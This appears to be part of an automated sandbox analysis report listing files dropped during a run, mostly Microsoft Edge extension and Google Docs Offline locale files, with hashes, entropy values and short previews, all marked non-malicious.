                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0x48a80eb4, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15728640
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.10104014649099108
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:2SB2jpSB2jFSjlK/sw/ZweshzbOlqVqNes3zbtzbheszO/ZklMes1:2a6aCUueqUW9A6d
                                                                                                                                                                                                                                                                                              MD5:E796721168B5A15288B11EA0CF3FEAD1
                                                                                                                                                                                                                                                                                              SHA1:370A6B25D747D53E95DC4E42C0CE76E8F9C85748
                                                                                                                                                                                                                                                                                              SHA-256:6D7692842AC335C0F73B9FB100338D6895F6160197337695DC188F1D616E7461
                                                                                                                                                                                                                                                                                              SHA-512:0740529F4959CD2C9354B304C75EF4C8EDBF70F0C8D48076EBA95A7FFF171D07ECF67ABFEBFF48C28CCD17949D3F26CC381B60179B567B864360C2D09D2A6F46
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:H...... ...................':...{........................T.....8+...{...,...{G.h.V.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.......................................,...{G......................,...{G..........................#......h.V.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.406519685512865
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0FG5unSR0F3Y5M:JIVuwEw5MUFZLBQLtnHZM
                                                                                                                                                                                                                                                                                              MD5:B5CFDEF27F74B9A656F7C46B14B1E300
                                                                                                                                                                                                                                                                                              SHA1:E4D8AEDB938B2D29345D1F9C5DC2049F68C90D31
                                                                                                                                                                                                                                                                                              SHA-256:846790F96F2FD323BB542EC1B8F443C65B129AAC3A6CCD6D62911CC4D48046AE
                                                                                                                                                                                                                                                                                              SHA-512:F43F82209354D12996BB03304EB05D183D49B93E6B200F6F393F2805B0707A0727A9FF1FCA2C2B20BED41D0346083293CBFB5469BFBD19009E7BBE7FACB354B7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138356
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                              MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                              SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                              SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                              SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4982
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):908
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1285
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3107
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                              MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                              SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                              MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):806
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
